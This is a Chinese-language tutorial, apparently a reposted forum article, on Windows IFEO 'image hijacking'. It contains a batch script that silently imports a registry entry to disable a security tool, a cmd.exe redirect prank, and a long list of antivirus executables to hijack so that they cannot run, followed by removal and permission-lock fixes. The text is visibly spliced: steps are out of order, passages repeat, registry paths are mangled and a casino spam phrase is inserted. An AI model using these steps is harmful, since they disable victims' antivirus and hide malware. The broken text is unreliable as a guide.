所谓的镜像劫持,就是在注册表的[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NT CurrentVersionImage File Execution
Options]处新建一个以杀毒软件主程序命名的项,例如Rav.exe。然后再创建一个子键“Debugger=”C:\WINDOWS\
system32\drivers\ceffen.com”。以后只要用户双击
Rav.exe就会运行OSO的病毒文件ceffen.com,类似文件关联的效果

什么是印象劫持?

现在病毒都会采用IFO的技术,通俗的讲法是映像劫持,利用的是注册表中的如下键值:HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows
NT/CurrentVersion/Image File Execution
Options位置来改变程序调用的,而病毒却利用此处将正常的杀毒软件给偷换成病毒程序。事物都有其两面性,其实,我们也可以利用该键值来欺瞒病毒木马,让它实效。可谓,将计就计,还治其人。

映像劫持
windows映像劫持技术(IFEO)
基本症状:可能有朋友遇到过这样的情况,一个正常的程序,无论把他放在哪个位置或者是重新用安装盘修复过的程序,都无法运行或者是比如运行A却成了执行B的程序了,而改名后却可以正常运行。。
既然我们是介绍IFEO技术相关,那我们就先介绍下:

所谓的IFEO就是”Image File Execution Options”
都是注册表中的这个项惹得祸(HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionImage File Execution Options).
由于这个项主要是用来调试程序用的,对一般用户意义不大(默认是只有管理员和local
system有权读写修改)。
原理说简单点就是因为NT在收到文件执行请求时,会先检查文件是否是可执行的(关键就在这里,会检查对应文件的相关映射!这时在ifeo中的内容将被调用)然后再检查文件类型!

下面我们以屏蔽某未知病毒KAVSVC.EXE为例,操作方法如下:

一,什么是映像胁持(IFEO)?
所谓的IFEO就是Image File Execution Options
在是位于注册表的
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionImage File Execution Options
由于这个项主要是用来调试程序用的,对一般用户意义不大。默认是只有管理员和local
system有权读写修改
先看看常规病毒等怎么修改注册表吧。。
那些病毒、蠕虫和,木马等仍然使用众所皆知并且过度使用的注册表键值,如下:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
HKLMSOFTWAREMicrosoftWindows
NTCurrentVersionWindows澳门新葡萄京官网注册 ,AppInit_DLLs
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonNotify
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesOnce下面是蓝色寒冰的一段介绍:
@echo off //关闭命令回显
echo 此批处理只作技巧介绍,请勿用于非法活动!//显示echo后的文字
pause //停止
echo Windows Registry Editor Version 5.00>>ssm.reg
echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionImage File Execution Optionssyssafe.EXE]
>>ssm.reg
echo “Debugger”=”syssafe.EXE” >>ssm.reg
//把echo后的文字导出到SSM.reg中
regedit /s ssm.reg &del /q ssm.reg //导入ssm.reg并删除
使SSM失效HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionImage File Execution
Optionssvchost.exe项下的”Debugger”=”abc.exe”
意思是不执行svchost.exe而执行abc.exe
QUOTE:
可能说了上面那么多,大家还弄不懂是什么意思,没关系,我们大家一起来看网络上另一个朋友做得试验:

一个印象劫持的小实验:

第一步:先建立以下一文本文件,输入以下内容:

开始-运行-regedit,展开到:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionImage File Execution Options
然后选上Image File Execution
Options,新建个项,然后,把这个项(默认在最后面)然后改成123.exe

开始-运行-regedit,展开到:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionImage File Execution Options
然后在这个下面新建一个项,把项的名字改成xxx.exe
然后点xxx.exe,在右侧新建一个字符串,名称为Dubugger
在字符串里指点另一个exe文件的路径,如(“%system%/system32/cmd.exe”);
最后,只要文件名是xxx的所有exe文件,都会去执行你在debugger中指定的文件!

      Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/
Image File Execution Options/KAVSVC.EXE]
“Debugger”=”d://1.exe”
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/
Image File Execution Options/KAVSVC.EXE]
“Debugger”=”d://1.exe”
      (注:第一行代码下有空行。)

选上123.exe这个项,然后默认右边是空白的,我们点右键,新建个“字串符”,然后改名为“Debugger”
这一步要做好,然后回车,就可以。。。再双击该键,修改数据数值(其实就是路径)。。
把它改为 C:windowssystem32CMD.exe
(PS:C:是系统盘,如果你系统安装在D则改为D:如果是NT或2K的系统的话,把Windows改成Winnt,下面如有再T起,类推。。。)
好了,实验下。~ .
然后找个扩展名为EXE的,(我这里拿IcesWord.exe做实验),改名为123.exe。。。
然后运行之。。。嘿嘿。。出现了DOS操作框,不知情的看着一闪闪的光标,肯定觉得特鬼异~^_^。。
一次简单的恶作剧就成咧。。。
同理,病毒等也可以利用这样的方法,把杀软、安全工具等名字再进行重定向,指向病毒路径
SO..如果你把病毒清理掉后,重定向项没有清理的话,由于IFEO的作用,没被损坏的程序一样运行不了!
三,映像胁持的基本原理:
QUOTE:
NT系统在试图执行一个从命令行调用的可执行文件运行请求时,先会检查运行程序是不是可执行文件,如果是的话,再检查格式的,然后就会检查是否存在。。如果不存在的话,它会提示系统找不到文件或者是“指定的路径不正确等等。。
当然,把这些键删除后,程序就可以运行!
四,映像胁持的具体案例:
引用JM的jzb770325001版主的一个分析案例:
QUOTE:
蔚为壮观的IFEO,稍微有些名气的都挂了:
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution Optionsavp.exe
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution OptionsAgentSvr.exe
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution OptionsCCenter.exe
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution OptionsRav.exe
从这个案例,我们可以看到这个技术的强大之处!很多的杀软进程和一些辅助杀软或工具,全部被胁持,导致你遇到的所有杀软都无法运行!
试想如果更多病毒,利用于此,将是多么可怕的事情!
五:如何解决并预防IFEO?
方法一: 限制法(转自网络搜索)
它要修改Image File Execution
Options,所先要有权限,才可读,于是。。一条思路就成了。。
开始-运行-regedt32 (这个是系统的32位注册表,和注册表操作方法差不多)
然后还是展开到: )
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionImage File Execution Options

如果我们添加上如下的IFEO项目,几乎所有稍为有些名气的杀毒软件和杀辅助软件都挂了,呵呵。
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution Optionsavp.exe
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution OptionsAgentSvr.exe
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution OptionsCCenter.exe
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution OptionsRav.exe
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution OptionsRavMonD.exe
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution OptionsRavStub.exe
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution OptionsRavTask.exe
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution Optionsrfwcfg.exe
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution Optionsrfwsrv.exe
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution OptionsRsAgent.exe
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution OptionsRsaupd.exe
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File
Execution Optionsruniep.exe

第二步:将以上文本另存为1.reg,双击1.reg以导入该reg文件,确定。

方法二:
把[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionImage File Execution Options]项删除即可

如何防治呢?

第三步:点”开始→运行”后,输入KAVSVC.EXE。

方法一:限制法
要修改Image File Execution
Options,所先要有权限,才可读,于是。。一条思路就成了。。
开始-运行-regedt32 (这个是系统的32位注册表,和注册表操作方法差不多)
然后还是展开到: )
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionImage File Execution Options
右键——选择权限
把权限改为拒绝即可.

提示:1.exe可以是任意无用的文件,是我们随意创建一个文本文件后将后缀名.txt改为.exe的。

方法二:
把[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionImage File Execution Options]
下面除了Your Image File Name Here without a path以外的所有项删除即可。
方法三:
使用IFEO映像挟持修复程序修复!(该方法是用于中毒修复,不能作防范)

?